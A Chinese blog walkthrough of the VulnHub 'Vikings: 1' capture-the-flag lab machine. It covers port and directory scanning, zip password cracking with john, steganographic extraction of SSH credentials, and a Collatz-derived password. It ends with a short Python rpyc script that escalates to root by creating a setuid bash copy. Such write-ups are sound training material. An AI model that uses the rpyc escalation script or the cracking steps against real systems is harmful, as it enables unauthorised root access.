Vulnhub-VIKINGS: 1

已于 2023-02-03 00:24:12 修改
阅读量306 收藏 3
点赞数 1
分类专栏: 渗透测试 文章标签: 安全 网络安全 web安全 Powered by 金山文档
于 2023-02-03 00:19:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Re1_zf/article/details/128857663
版权

一、概要

靶机地址:192.168.56.105
攻击机地址:192.168.56.101
靶机下载地址:https://download.vulnhub.com/vikings/Vikings.ova
根据介绍,这是一台CTF类型的靶机,没有兔子洞,可以放心打

二、主机发现

arp-scan扫描一下局域网靶机的ip

三、信息收集

1、端口扫描

nmap脚本扫描一下

nmap -sS -A -T4 -p- 192.168.56.105

目标靶机开放了22端口ssh服务和80端口web服务

首先看一下web服务的内容

很简单的一个页面,就是一个目录

什么也没有

2、目录扫描

扫一下目录

使用gobuster扫描,指定字典/usr/share/dirb/wordlists/common.txt

默认的扫不出来什么东西,毕竟这是ctf机器

可以发现最后有一个war.txt文件

打开显示是一个目录

3、base64解码

打开这个目录是一大串base64编码

base64解码保存为一个文件,发现是个压缩包

curl http://192.168.56.105/site/war-is-over/ | base64 -d > test1

压缩包还有密码

4、密码爆破

爆破一下

fcrackzip爆不出来

使用zip2john先把压缩包信息提取出来

再用john指定rockyou.txt字典进行爆破

zip2john test1 > test2
john test2 --wordlist=/usr/share/wordlists/rockyou.txt

得到密码为ragnarok123

压缩包的内容是个图片

5、图片隐写

binwalk看一下是否有隐藏信息

binwalk -e king

里面还有个压缩包,压缩包里面是个user文件,内容是下面这样的

目测是一对账户密码

用户名:floki
密码:f@m0usboatbuilde7

四、渗透测试

1、ssh服务连接

ssh服务连接成功

2、关键信息

当前目录下有两个文件

原文:
_______________________________________________________________________Floki-Creation____________________________________________________________________________________________________


I am the famous boat builder Floki. We raided Paris this with our all might yet we failed. We don't know where Ragnar is after the war. He is in so grief right now. I want to apologise to him.
Because it was I who was leading all the Vikings. I need to find him. He can be anywhere. 
I need to create this `boat` to find Ragnar
译文:
_______________________________________________________________________Floki-Creation____________________________________________________________________________________________________

我是著名的造船师Floki。我们全力以赴地袭击了巴黎,但我们失败了。我们不知道战后Ragnar在哪里。他现在非常悲伤。我想向他道歉。
因为是我领导了所有的维京人。我需要找到他。他可以在任何地方。
我需要创造这艘“船”来找到Ragnar

原文:
#Printable chars are your ally.
#num = 29th prime-number.
collatz-conjecture(num)
译文:
#Printable字符是你的盟友。
#num = 第 29 个质数。
collatz-conjecture(num)

根据上面的信息我们可以了解到:

我们需要找到名为Ragnar的用户

然后他的密码可能就是下面这个num,但是num似乎是要用collatz-conjecture算出第29个质数(也就是109)

3、collatz猜想

网上有现成的小脚本,可以直接用

def collatz(x):
        result = [109]
        while x != 1:
                if x % 2 == 1:
                        x = (3 * x) + 1
                else:
                        x = (x / 2)
                if x <= 255:
                        result.append(int(x))
        return result

print(collatz(109))

得到一串数字

4、解码(十进制转字符串)

使用这个网站进行解码比较好用

https://gchq.github.io/CyberChef/

十进制转字符串是这样的

109, 164, 82, 41, 124, 62, 31, 94, 47, 142, 71, 214, 107, 161, 242, 121, 182, 91, 137, 206, 103, 155, 233, 175, 167, 251, 244, 122, 61, 184, 92, 46, 23, 70, 35, 106, 53, 160, 80, 40, 20, 10, 5, 16, 8, 4, 2, 1  

mR)|>^/Gky[gz=\.F#j5P(
这个应该就是密码了

5、第二个用户登录成功

ssh登录成功

python写一个交互式shell

然后查看一下当前目录文件

6、FirstBlood

user.txt得到第一个flag

查看其他文件寻找关键信息

.profile里面有root权限执行的命令

7、利用rpyc提权

很明显这个东西是可以进行远程控制的

我们直接写个脚本,让它主动连过来,就可以达到提权的效果了

import rpyc
conn = rpyc.classic.connect('localhost')
def getshell():
        import os
        os.system('rm /tmp/rootshell')
        os.system('cp /bin/bash /tmp/rootshell && chmod +s /tmp/rootshell')
shell = conn.teleport(getshell)
shell()

直接运行脚本(注意使用python3)

/tmp目录下生成了rootshell文件

切换到/tmp目录下执行

./rootshell -p

拿到第二个flag

五、总结

1、目录扫描要灵活运用字典,尤其是这种CTF的靶机,默认字典大概率扫不出来什么东西
2、密码爆破可以使用fcrackzip,不行的话再去尝试zip2john和john字典爆破
3、binwalk善于查看图片等隐写内容
4、根据提示信息灵活编写和查找脚本以拿到关键信息
5、解码网站:https://gchq.github.io/CyberChef/
6、仔细查看当前用户的所有文件的信息,对sudo 等root权限操作敏感
Re1_zf
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
VnlnHub Vikings
weixin_45682839的博客
09-13 844
涉及知识包括:端口服务探测、敏感目录文件搜集、base64编码、WEB信息收集、文件还原、压缩包密码爆破、图片隐写和提取、素数、考拉兹猜想、python代码编写、rpyc服务提权
明尼苏达维京人新闻选项卡「Minnesota Vikings News Tab」-crx插件
03-11
在Chrome新标签页上获取最佳明尼苏达维京人新闻。添加任何主题或新闻来源。 在您的Chrome标签上获取“维京人”新闻; 设置主题和墙纸,获取比分,时间表等等。 厌倦了在您最喜欢的NFL博客中玩弄以获得当天明尼苏达维京人的头条新闻吗? 在“开始” /“新”标签页上获取所有维京人新闻。 添加任何其他主题,新闻来源,RSS提要或Twitter提要。 最受欢迎的新闻阅读器NewsTab现在可作为专用于Vikings新闻的New Tab Chrome扩展程序获得。 借助NewsTab扩展程序,您打开的每个新标签页都会从领先的出版物中获取明尼苏达州维京人的最新新闻。 所有这些都以美丽,丰富的图像为背景。 明尼苏达州《 Vikings》选项卡也可作为Android和iOS应用程序使用(链接可从扩展程序内获得)。 关于:提供者:http://www.nflnewstab.com/ https://nflnewstab.com/terms-of-use/ https://nflnewstab.com/privacy-policy/网站:https://nflnewstab.com / 支持语言:English
Vikings.com HQ Video Fetcher-crx插件
04-03
语言:English (United States) 让我们知道HQ视频可从Vikings.com获得,如果有的话,如果有的话,如果有的话,抓住与Vikings.com上的任何视频相关的高质量视频。 这是我的第一个Chrome扩展,这意味着我并不完全确定为什么我需要访问浏览历史记录。 即使我根本没有触及浏览历史,我也需要使用这一许可。 如果您想查看源代码,您可以在此处找到:https://github.com/joshft91/vikings-hq-video-fetcher
NFL Minnesota Vikings Wallpaper Custom NewTab-crx插件
04-04
语言:English NFL明尼苏达维京人新选项卡是使用NFL明尼苏达维京人壁纸的自定义newtab。 专为NFL明尼苏达维京人球迷而设的主题。 在“开始”页面中安装我的NFL明尼苏达州维京人壁纸新标签,以享受各种高清NFL明尼苏达州维京人壁纸。 产品特点:★随机播放所有NFL明尼苏达州维京人壁纸背景,或者只是您最喜欢的NFL明尼苏达州维京人背景壁纸。 ★便签,待办事项和提醒,事件倒计时。 ★NFL明尼苏达州维京人队直播壁纸,屏保和NFL明尼苏达州维京人队主题幻灯片。 ★快速拨号,快速启动的应用程序和访问量最大的网站。 ★保持NFL明尼苏达维京人队壁纸新标签同步,结合所有体育项目newtab-获取更多NFL明尼苏达维京人队主题:https://sportifytab.com/?s = nfl + minnesota + vikings + wallpaper + new + tab&post_type = post主页:https ://sportifytab.com/minnesota-vikings-hd-wallpaper-nfl-new-tab/
POLYGON – Vikings Pack v1.3
09-08
Key Features - 221 unique assets with x4 alternative texture colors. - Customizable Viking Boat, Fishing Boat, Modular Buildings, Mountains, Table, Seat, Fish Pile, Modular Beach sections, Dirt mounds, Glacier Ice Chunks, Floating ice pieces, Icebergs, Modular wood pathway, Stone rocks, Rocks, Mountain Statue, Plants, Trees, Weapons, Cross, Totem, Bench, Beer Mug, Cow Skull, Clay Pot, Chest, Goblet, Fur Rolls, Ladder, Weapons rack, Fishing nets, Fish bucket, Hanging fish, Wooden fish hanger, Weapons rack, Wheel Barrow, Spiked defense, Anvil, Wharf. Characters (x5) - Chief 01, Warrior 01, Warrior 02, Grunt 01, Grunt 02. (with Alternative colors) - Heaps of awesome content included (see the layout screenshots for more details) - Includes winter versions of most assets with custom snow Compatibility - Supports Universal Render Pipeline (URP) - URP Guide Here - Characters are setup to work with Mecanim (no animations included in this pack)
vulnhubvikings
weixin_54431413的博客
05-22 826
渗透常规操作,主机发现,端口扫描,服务版本发现,web页面信息收集-看看源代码中有没有有用的注释,api接口,隐藏的路径,之后涉及到暴力破解,对隐写内容的查看,角古猜想,最后提权方面,利用了一个程序的api接口,将ragnar加入到了sudo组里,从而通过sudo -s来提权。
Vikings靶机之gobuste路径发掘-大字典、编码转化/文件还原、离线密码破解、隐写术、二进制文件提取、素数查找/科拉茨猜想、RPC漏洞提权
qq_40898302的博客
05-18 240
重新连接目标靶机,已经通过exp将自己添加为sudo权限。对zip文件进行密码破解,密码为ragnarok123。进行entropy商算,大于7.5可能为压缩文件。解压a.zip文件,得到一个叫king的图片。对编码文件进行bash64解密,为编码。在floki的用户当前目录发现两个文件。发现当前目录下的.profile文件。在靶机当前用户运行exp.py 文件。查看rpyc是否开放18812端口。对密码进行质素计算和科拉茨计算。对10进行ascii 进行还原。在目标靶机创建exp文件。
VulnHub靶机渗透实战9-vikings
随心所欲不逾矩
11-25 732
本次靶机是CTF风格的靶机。靶场地址:Vikings: 1 ~ VulnHub fcrackzip工具也能用来爆破密码。 用户名密码:floki/f@m0usboatbuilde7 所以boat的意思是让我们对第二十九个质数做考拉兹猜想,所得到的数的数列,其中可打印的字符(ascall可以代表的字符,256以内),就是我们要得到的首先我们编写一段简单的python代码来计算出第二十九个质数。 再编写一个简单python做考拉兹猜想,并且输出所有ascall为256以内的字
vulnhub--Vikings: 1
weixin_46107179的博客
04-26 288
靶机下载地址:下载链接 主机发现 通过arp-scan -l发现主机 信息搜集 通过nmap收集ip地址信息(开放22,80端口) 进行访问80端口,发现有一个site目录,进一步访问发现主页面只有一些简单介绍,访问时,访问速度很慢,查看源代码才知道,去访问了一些谷歌等的资源,所以访问页面比较慢 然后扫描目录,发现该目录下有一个war.txt文件 访问war.txt发现这是一个路径 访问该路径,发现是通过base64加密的 下载下来并查看文件类型发现是zip类型 发现解压需要密码 用john
speldesign-super-vikings:GitHub Classroom创建的speldesign-super-vikings
05-23
超级维京人游戏移相器游戏在本地主机上构建并运行首次安装依赖项: npm install 要创建生产版本: npm run build:prod 要创建开发版本: npm run build:dev跑步open index.html in either root (~) or the dev ...
lab-data-vikings:维京人被移植到python。 耶!!
03-17
实验室| 维京人(Lab-data-vikings) 介绍 维京人和撒克逊人处于战争状态。 两者都是士兵,但是他们有自己的战斗方法。 维京人已移植到Python。 耶!! 在本实验室中,您将使用Python中的继承概念。 入门 您将在此...
lab-javascript-vikings:用于练习面向对象编程JavaScript练习
02-16
实验室JS Vikings面向对象的编程介绍我们已经学习了面向对象的编程,以及如何在JavaScript中使用class和继承。 现在,让我们与维京朋友一起使用我们刚刚学到的所有概念。要求分叉此回购克隆此仓库提交完成后,运行...
Vikings-Bootstrap:使用引导程序的网站个人设计
04-11
维京人靴 使用引导程序的网站的个人项目,这是通过添加其他技术创建的第二个版本,第一个版本位于链接。:“ ”
project-template:项目模板
06-22
Vikings of Code - 项目模板 使用 、 和构建 git clone https://github.com/vikingsofcode/project-template.git <project> cd npm install bower install gulp start Check the console for local / external URL...
Vulnhub靶场】VIKINGS: 1
DG_s1mple
03-23 1958
环境准备 下载靶机导入到vmware 靶机IP地址:192.168.2.17 攻击机IP地址:192.168.2.18 信息收集 我们使用nmap扫描一下靶机端口的开放情况 发现靶机之开放了ssh跟http服务,我们首先访问一下靶机的网站 我们点进去看看 找了一下没有什么有用的信息 渗透开始 我们扫描一下靶机网站的目录文件 发现有一个war.txt,我们去访问一下 是一串base64编码,我们把它拿去解码 使用file命令发现,是一个zip文件,我们修改后缀,把它解压出来 发现需要密码,我
Alfa: 1 vulnhub walkthrough
xdeclearn的博客
03-10 420
信息页:http://www.vulnhub.com/entry/alfa-1,655/ 关键字:Enumeration | Web Application | Brute Force | Privilege Escalation 0x01 端口扫描 PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 139/tcp open netbios-ssn 445/tcp open microsoft-ds 65111/tc
48.网络安全渗透测试—[穷举篇11]—[webshell密码破解(asp/aspx/php)]
热门推荐
qwsn
08-07 67万+
我认为:无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、burpsuite2.0 webshell密码破解办法 1、目标1: `http://www.yijuhua.com/b.asp` 2、目标2:`http://www.yijuhua.com/b.php` 3、目标3:`http://www.yijuhua.com/b.aspx`
靶机记录Beelzebub、Vikings、Deathnote
qq_287064772的博客
08-13 146
Beelzebub、Vikings、Deathnote
opencv人脸跟踪
最新发布
09-16
OpenCV人脸跟踪是通过使用OpenCV库中的人脸检测器来实现的...cv.namedWindow('Vikings Detected') cv.imshow('Vikings Detected', img) cv.waitKey(0) ``` 以上代码会在图像中检测出人脸,并用蓝色的矩形框标记出来。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值